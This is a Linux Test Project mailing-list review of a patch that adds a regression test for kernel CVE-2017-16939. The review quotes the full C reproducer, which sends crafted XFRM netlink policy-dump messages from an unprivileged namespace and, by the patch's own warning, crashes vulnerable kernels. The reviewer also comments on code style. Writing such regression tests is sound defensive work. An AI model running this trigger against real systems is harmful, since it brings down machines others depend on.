[LTP] [PATCH] Add regression test for CVE-2017-16939

Wed Mar 7 18:05:29 CET 2018

Hi!
> https://blogs.securiteam.com/index.php/archives/3535
> 
> Warning! If the kernel is vulnerable to this CVE, it will definitely
> die with "Fatal Exception in Interrupt". So do not run this on a
> production machine!
> 
> Signed-off-by: Michael Moese <mmoese@suse.de>
> ---
>  runtest/cve                    |   1 +
>  testcases/cve/.gitignore       |   1 +
>  testcases/cve/cve-2017-16939.c | 132 +++++++++++++++++++++++++++++++++++++++++
>  3 files changed, 134 insertions(+)
>  create mode 100644 testcases/cve/cve-2017-16939.c
> 
> diff --git a/runtest/cve b/runtest/cve
> index 6de2ed0ac..b93efb57a 100644
> --- a/runtest/cve
> +++ b/runtest/cve
> @@ -29,3 +29,4 @@ cve-2017-17807 request_key04
>  cve-2017-1000364 stack_clash
>  cve-2017-5754 meltdown
>  cve-2017-17052 cve-2017-17052
> +cve-2017-16939 cve-2017-16939
> diff --git a/testcases/cve/.gitignore b/testcases/cve/.gitignore
> index 42f32e825..8db78fd87 100644
> --- a/testcases/cve/.gitignore
> +++ b/testcases/cve/.gitignore
> @@ -11,3 +11,4 @@ cve-2017-5669
>  meltdown
>  stack_clash
>  cve-2017-17052
> +cve-2017-16939
> diff --git a/testcases/cve/cve-2017-16939.c b/testcases/cve/cve-2017-16939.c
> new file mode 100644
> index 000000000..ea56530c7
> --- /dev/null
> +++ b/testcases/cve/cve-2017-16939.c
> @@ -0,0 +1,132 @@
> +/*
> + * Copyright (c) 2018 Michael Moese <mmoese@suse.de>
> + *
> + * This program is free software: you can redistribute it and/or modify
> + * it under the terms of the GNU General Public License as published by
> + * the Free Software Foundation, either version 2 of the License, or
> + * (at your option) any later version.
> + *
> + * This program is distributed in the hope that it will be useful,
> + * but WITHOUT ANY WARRANTY; without even the implied warranty of
> + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
> + * GNU General Public License for more details.
> + *
> + * You should have received a copy of the GNU General Public License
> + * along with this program. If not, see <http://www.gnu.org/licenses/>.
> + */
> +/* Regression test for CVE-2017-16939
> + * based on the reproducing code from Mohammed Ghannam, published on
> + * https://blogs.securiteam.com/index.php/archives/3535
> + *
> + * CAUTION! If your system is vulnerable to this CVE, the kernel
> + * WILL die with a "Fatal Exception in Interrupt".
> + */
> +
> +#include <unistd.h>
> +#include <sched.h>
> +#include <stdlib.h>
> +#include <string.h>
> +#include <sys/socket.h>
> +#include <sys/wait.h>
> +#include <netinet/in.h>
> +#include <linux/netlink.h>
> +#include <linux/xfrm.h>
> +
> +#include "tst_test.h"
> +#include "tst_res_flags.h"
> +#include "tst_safe_macros.h"
> +#include "tst_safe_net.h"
> +
> +#define BUFSIZE 2048
> +
> +static int fd;
> +static struct sockaddr_nl addr;
> +
> +struct msg_policy {
> +	struct nlmsghdr msg;
> +	char buf[BUFSIZE];
> +};
> +
> +static void create_nl_socket(void)
> +{
> +	fd = socket(PF_NETLINK, SOCK_RAW, NETLINK_XFRM);
             ^
	     SAFE_SOCKET() ?

> +	memset(&addr, 0, sizeof(struct sockaddr_nl));
> +	addr.nl_family = AF_NETLINK;
> +	addr.nl_pid = 0; /* packet goes into the kernel */
> +	addr.nl_groups = XFRMNLGRP_NONE; /* no need for multicast group */
> +}
> +
> +static void do_setsockopt(void)
> +{
> +	int var = 0x100;
> +
> +	SAFE_SETSOCKOPT(fd, 1, SO_RCVBUF, &var, sizeof(int));
> +}
> +
> +static struct msg_policy *init_policy_dump(void)
> +{
> +	struct msg_policy *r;
> +
> +	r = SAFE_MALLOC(sizeof(struct msg_policy));
> +	memset(r, 0, sizeof(struct msg_policy));
> +
> +	r->msg.nlmsg_len = 0x10;
> +	r->msg.nlmsg_type = XFRM_MSG_GETPOLICY;
> +	r->msg.nlmsg_flags = NLM_F_MATCH | NLM_F_MULTI |  NLM_F_REQUEST;
> +	r->msg.nlmsg_seq = 0x1;
> +	r->msg.nlmsg_pid = 2;
> +
> +	return r;
> +}
> +
> +static int send_msg(int fd, struct nlmsghdr *msg)
> +{
> +	return SAFE_SENDTO(1, fd, (void *) msg, msg->nlmsg_len, 0,
> +			   (struct sockaddr *) &addr,
> +			   sizeof(struct sockaddr_nl));
> +}
> +
> +static void create_ns(void)
> +{
> +	if (unshare(CLONE_NEWUSER) != 0)
> +		tst_brk(TCONF, "unshare(CLONE_NEWUSER) failed");
> +	if (unshare(CLONE_NEWNET) != 0)
> +		tst_brk(TCONF, "unshare(CLONE_NEWNET) failed");
> +}
> +
> +static void do_run(void)
> +{
> +	struct msg_policy *p;
> +
> +	create_ns();
> +	create_nl_socket();
> +	p = init_policy_dump();
> +	do_setsockopt();
> +	send_msg(fd, &p->msg);
> +	p = init_policy_dump();

Do we have to initialize the policy here for a second time?
(does the fact that the p is a different pointe here matters?)

Also we should probably allocate these once in the test setup so that we
do not waste memory when the test is executed with the -i option.

> +	send_msg(fd, &p->msg);
> +
> +	exit(0);
> +}
> +
> +static void run(void)
> +{
> +	pid_t pid;
> +	int status;
> +
> +	pid = SAFE_FORK();
> +	if (pid == 0) {
> +		do_run();
> +	} else {
> +		usleep(250000);
                ^
		Why the usleep here? Should just the waitpid() below
		suffice in waiting for the child to exit?

> +		SAFE_WAITPID(pid, &status, 0);
> +		if (!WIFEXITED(status))
> +			tst_res(TFAIL, "Kernel has issues");
> +	}
> +	tst_res(TPASS, "Kernel seems to have survived");
> +}
> +
> +static struct tst_test test = {
> +	.forks_child = 1,
> +	.test_all = run,
> +};
> -- 
> 2.13.6
> 
> 
> -- 
> Mailing list info: https://lists.linux.it/listinfo/ltp

-- 
Cyril Hrubis
chrubis@suse.cz